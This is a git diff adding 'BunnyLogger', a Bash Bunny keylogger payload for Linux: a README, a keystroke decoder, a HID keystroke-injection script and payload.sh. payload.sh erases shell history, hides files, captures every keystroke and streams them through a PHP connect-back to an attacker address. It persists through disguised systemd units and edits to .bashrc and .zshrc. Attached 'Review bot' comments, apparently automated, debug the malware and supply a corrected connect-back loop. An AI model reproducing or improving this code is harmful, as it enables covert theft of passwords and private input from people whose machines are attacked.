diff --git a/payloads/library/credentials/BunnyLogger/README.md b/payloads/library/credentials/BunnyLogger/README.md
new file mode 100644
index 00000000..7c19270f
--- /dev/null
+++ b/payloads/library/credentials/BunnyLogger/README.md
@@ -0,0 +1,62 @@
+## About:
+* Title: BunnyLogger
+* Description: Key logger which sends each and every key stroke of target remotely/locally.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Credentials
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
+
+### Features:
+* Live keystroke capturing.
+* Detailed key logs.
+* Persistent
+* Autostart payload on boot.
+
+### Workflow:
+* Encoding payload and injecting on target's system.
+* Checks whether internet is connected to the target system.
+* If internet is connected then it sends raw keystrokes to attacker.
+* Attacker processes raw keystrokes.
+
+### Changes to be made in payload.sh:
+* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`.
+* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| payload.txt | /payload/switch1/ |
+| payload.sh | /payload/ |
+| xinput | /tools/ |
+
+### Usage:
+1. Encode payload.txt and inject into target's system.
+2. Start netcat listner on attacking system:
+
+* `nc -lvp > ` use this command to create new logfile with raw keystrokes.
+* `nc -lvp >> ` use this command to append raw keystrokes to existing logfile.
+3. Process raw keystrokes using BunnyLoggerDecoder utility:
+```
+./bunnyLoggerDecoder
+bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger.
+
+Usage:
+Decode captured log: [./bunnyLoggerDecoder -f -m -o ]
+
+Options:
+-f Specify Log file.
+-m Select Mode(normal|informative)
+-o Specify Output file.
+-h For this banner.
+```
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder b/payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder
new file mode 100644
index 00000000..c4aa994d
--- /dev/null
+++ b/payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder
@@ -0,0 +1,50 @@
+usage () {
+ echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n"
+ echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f -m -o ]";
+ echo -e "\nOptions:"
+ echo -e "-f\tSpecify Log file."
+ echo -e "-m\tSelect Mode(normal|informative)"
+ echo -e "-o\tSpecify Output file."
+ echo -e "-h\tFor this banner."
+}
+while getopts o:m:f:h: flag
+do
+ case "${flag}" in
+ o) output=$OPTARG ;;
+ m) mode=$OPTARG ;;
+ f) filename=$OPTARG ;;
+ h) help=$OPTARG ;;
+ *)
+ usage
+ exit 1
+ esac
+done
+
+if [ -z "$output" ] && [ -z "$filename" ]; then
+ usage
+ exit 1
+fi
+if [ -z "$filename" ]; then
+ echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
+ exit 1
+fi
+if [ -z "$output" ]; then
+ echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
+ exit 1
+fi
+if [ -z "$mode" ]; then
+ echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
+ exit 1
+fi
+if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
+ echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
+ exit 1
+fi
+if [ "$mode" == "normal" ] ; then
+ awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
+ exit 1
+fi
+if [ "$mode" == "informative" ] ; then
+ awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
+ exit 1
+fi
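Review bot: The keycode-to-keysym table in both `awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} ...'` lines is built from `xmodmap -pke` on the machine running the decoder, so a log is translated with the analyst's keyboard layout rather than the target's, and any target with a different layout or a remapped key produces wrong characters; either capture `xmodmap -pke` on the target alongside the keystrokes and add an option to read that file, or at least document the limitation next to the awk lines. Both successful paths end in `exit 1`, so any wrapper that checks the status sees a failure; they should be `exit 0`. `getopts o:m:f:h:` declares `-h` as taking an argument, so a bare `-h` only reaches `usage` through the getopts error path (with a stray "option requires an argument" message) and `help` is never read; use `h` without the colon and `h) usage; exit 0 ;;`. `$filename` and `$output` are unquoted in both pipelines and should be `"$filename"` and `"$output"`, and since the file has no shebang yet relies on `[ ... == ... ]` and `echo -e`, a `#!/bin/bash` first line would make the bash dependency explicit.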
diff --git a/payloads/library/credentials/BunnyLogger/payload.sh b/payloads/library/credentials/BunnyLogger/payload.sh
new file mode 100644
index 00000000..90d1ea36
--- /dev/null
+++ b/payloads/library/credentials/BunnyLogger/payload.sh
@@ -0,0 +1,24 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir /var/tmp/.system
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cp -r $mntt/tools/xinput /var/tmp/.system/
+echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
+chmod +x /var/tmp/.system/sys
+chmod +x /var/tmp/.system/xinput
+echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
+chmod +x /var/tmp/.system/systemBus
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
+chmod +x /var/tmp/.system/reboot
+echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
+systemctl --user daemon-reload
+systemctl --user enable --now systemBUS.service
+systemctl --user start --now systemBUS.service
+systemctl --user enable --now reboot.service
+systemctl --user start --now reboot.service
+echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? 
= 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
+chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
diff --git a/payloads/library/credentials/BunnyLogger/payload.txt b/payloads/library/credentials/BunnyLogger/payload.txt
new file mode 100644
index 00000000..f9c67969
--- /dev/null
+++ b/payloads/library/credentials/BunnyLogger/payload.txt
@@ -0,0 +1,56 @@
+# Title: BunnyLogger
+# Description: Key logger which sends each and every key stroke of target remotely/locally.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Credentials
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 2000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/credentials/BunnyLogger/xinput b/payloads/library/credentials/BunnyLogger/xinput
new file mode 100644
index 00000000..b9a54988
Binary files /dev/null and b/payloads/library/credentials/BunnyLogger/xinput differ
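Review bot: In the `echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then ..."` line that generates `/var/tmp/.system/systemBus`, `$?` is not escaped (the later `~/tmmmp` generator correctly writes `\$?`), so it is expanded when payload.sh runs and the written loop tests a constant such as `if [ 0 -eq 0 ]`, meaning the PHP connect-back fires on every iteration regardless of the ping result; write `\$?` or, better, `if ping -c 5 0.0.0.0; then`. The PHP fragment on the same line, `exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"")`, closes and reopens bash's double-quoted string around `<&3 >&3 2>&3`, and as the diff reads here the generated file appears to end up with `2>&3""` inside the `exec(...)` call, which PHP would reject; a quoted heredoc removes the escaping problem entirely, so I would replace that line with the version below and `cat` the result once to confirm. Both unit files use `WantedBy=multi-user.target`, which is a system-manager target; units under `~/.config/systemd/user` are conventionally `WantedBy=default.target`, and a user service only starts at login unless `loginctl enable-linger` is set, so the README's "autostart on boot" presumably rests on the `~/.bashrc`/`~/.zshrc` append rather than on systemd. The generated `sys` script runs `xinput test`, which needs `DISPLAY`/`XAUTHORITY` that a user service does not inherit unless the session environment is imported, so a comment on the `ExecStart=` line (`# needs DISPLAY in the user manager env, e.g. systemctl --user import-environment DISPLAY XAUTHORITY`) would save the next user a debugging session.
```shell
# … unchanged: history unset, Bunny lookup, xinput copy, sys generator …
# Quoted heredoc: nothing is expanded at write time, so $? and $sock need no
# escaping and the ping result is actually tested when the loop runs.
cat <<'EOF' > /var/tmp/.system/systemBus
while :
do
	if ping -c 5 0.0.0.0; then
		php -r '$sock=fsockopen("0.0.0.0",4444);exec("/var/tmp/.system/sys -i <&3 >&3 2>&3");'
	fi
done
EOF
chmod +x /var/tmp/.system/systemBus
# … unchanged: unit files, enable/start, rc-file append …
```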
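Review bot: `Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp` passes a mount point that, as far as I can tell, `udisksctl mount` does not accept — it chooses its own path under /media or /run/media — so `/tmp/tmppp` is either ignored or rejected and the real mount point is whatever the following `mntt=$(lsblk | grep $disk | awk '{print $7}')` happens to read from lsblk's seventh default column; typing `mntt=$(lsblk -no MOUNTPOINT /dev/$disk)` instead would drop the column counting and most of the quoting gymnastics in that `Q STRING`. The device is found with `lsblk | grep 1.8G`, which matches any other 1.8G disk or partition present, and when the Bunny shows up as both a disk and a partition line `$lol` holds two entries that the `awk '{print $1}'` silently reduces to the first; selecting by label (`lsblk -no NAME,LABEL`) or by the known size plus `TYPE` would be less accidental. `GET SWITCH_POSITION` is read but never used and can be dropped. The copy line `cp -r '$mntt'/payloads/payload.sh /tmp/` matches the Bunny's `/payloads/` directory while the README's table says `/payload/`, so the README is the side that looks wrong, but one of the two needs to change or the `chmod`/run lines that follow operate on a file that was never copied.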